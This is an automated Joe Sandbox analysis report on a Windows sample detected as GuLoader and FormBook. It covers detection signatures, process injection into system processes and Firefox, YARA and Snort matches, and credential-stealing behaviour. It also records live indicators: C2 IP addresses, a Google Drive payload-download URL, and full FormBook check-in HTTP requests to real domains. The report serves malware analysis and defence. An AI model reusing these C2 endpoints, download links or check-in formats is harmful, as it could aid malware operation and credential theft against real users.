Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Grundforbedre39.exe

Overview

General Information

Sample name:Grundforbedre39.exe
Analysis ID:1410990
MD5:0190a49f09dc90c7dc61959581be1e9f
SHA1:af5d8cfa73b77d96d3a489f5961cdab87c8339be
SHA256:cfa3c71c41d7a69fdfa223a92ec677067613c69b2b2627d760cda587725bfbf0
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • Grundforbedre39.exe (PID: 1984 cmdline: C:\Users\user\Desktop\Grundforbedre39.exe MD5: 0190A49F09DC90C7DC61959581BE1E9F)
    • Grundforbedre39.exe (PID: 9636 cmdline: C:\Users\user\Desktop\Grundforbedre39.exe MD5: 0190A49F09DC90C7DC61959581BE1E9F)
      • aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe (PID: 2820 cmdline: "C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netiougc.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\netiougc.exe MD5: DD8D09523CDB5610078DF64BA4889806)
          • aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe (PID: 7756 cmdline: "C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8920 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x95754:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x7f773:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b500:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1551f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:03/18/24-14:47:52.396598
        SID:2855465
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:19.191753
        SID:2855464
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:51:38.822796
        SID:2855464
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:01.784764
        SID:2855464
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:54:23.875361
        SID:2855465
        Source Port:49832
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:48:47.962356
        SID:2855464
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:54.719267
        SID:2855465
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:54:15.768570
        SID:2855464
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:24.598414
        SID:2855465
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:55:12.378053
        SID:2855464
        Source Port:49836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:48:50.665934
        SID:2855464
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:07.208566
        SID:2855464
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:48:56.063124
        SID:2855465
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:46.684407
        SID:2855464
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:09.906007
        SID:2855465
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:55:17.783109
        SID:2855465
        Source Port:49838
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:54:04.569559
        SID:2855464
        Source Port:49826
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:51:57.738933
        SID:2855465
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:55:09.672400
        SID:2855464
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:51:52.365896
        SID:2855464
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:52:14.229849
        SID:2855464
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:55:27.140061
        SID:2855464
        Source Port:49840
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:51:49.684588
        SID:2855464
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:16.488398
        SID:2855464
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:49.359644
        SID:2855464
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:54:18.470972
        SID:2855464
        Source Port:49830
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:52:11.542639
        SID:2855464
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:51:44.071965
        SID:2855465
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:55:23.264523
        SID:2855464
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:52:19.603596
        SID:2855465
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:54:09.929078
        SID:2855465
        Source Port:49828
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:49:04.487515
        SID:2855464
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:51:36.209099
        SID:2855464
        Source Port:49804
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:54:01.883179
        SID:2855464
        Source Port:49825
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-14:54:32.207163
        SID:2855465
        Source Port:49834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: Grundforbedre39.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://www.guiguigohost.com/m9so/Avira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: Grundforbedre39.exeReversingLabs: Detection: 23%
        Yara detected FormBook
        Source: Yara matchFile source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Grundforbedre39.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49758 version: TLS 1.2
        Source: Grundforbedre39.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: netiougc.pdbGCTL source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, 00000009.00000002.5890904969.0000000000A5E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Grundforbedre39.exe, Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: netiougc.pdb source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49778 -> 172.67.158.92:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49782 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49783 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49786 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49787 -> 46.30.215.63:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49788 -> 46.30.215.63:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49789 -> 46.30.215.63:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49790 -> 46.30.215.63:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49791 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49792 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49795 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49796 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49797 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49799 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49804 -> 172.67.130.3:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49805 -> 172.67.130.3:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49807 -> 172.67.130.3:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49808 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49809 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49811 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49812 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49813 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49815 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49825 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49826 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49828 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49829 -> 195.110.124.133:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49830 -> 195.110.124.133:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49832 -> 195.110.124.133:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49834 -> 172.67.158.92:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49835 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49836 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49838 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49839 -> 46.30.215.63:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49840 -> 46.30.215.63:80
        Source: Joe Sandbox ViewIP Address: 172.67.158.92 172.67.158.92
        Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
        Source: Joe Sandbox ViewIP Address: 198.177.123.106 198.177.123.106
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
        Source: Joe Sandbox ViewASN Name: FINALFRONTIERVG FINALFRONTIERVG
        Source: Joe Sandbox ViewASN Name: ONECOMDK ONECOMDK
        Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noonartists.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.alpinebretech.lifeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.manupaint.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.plainpathproductions.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.teenpattimasterapp.orgConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wbyzm5.buzzConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=1Qsa/7J+srdsR8Dz/ES5S27r13qOWkq23euP4yB+JqRfE/nsbLJ5FW7PdqHJizPjrTq31E4BOQDA72YgssNaoReb8a5kH4cRUYabd93Dw2rUjSskRvR+x9I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.feshi.storeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=jovxqEZjMvfd7zz2mTvvE1OonaQx4w6Z/02MEDusjhfET0PBGFNNsERdDgiHq90zA+FiNHbHunAjmlnnTBHWzyxLPlfgZ5XyFdT5RHsnhVfKl1JVA017Cgw=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cyberpsychsecurity.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
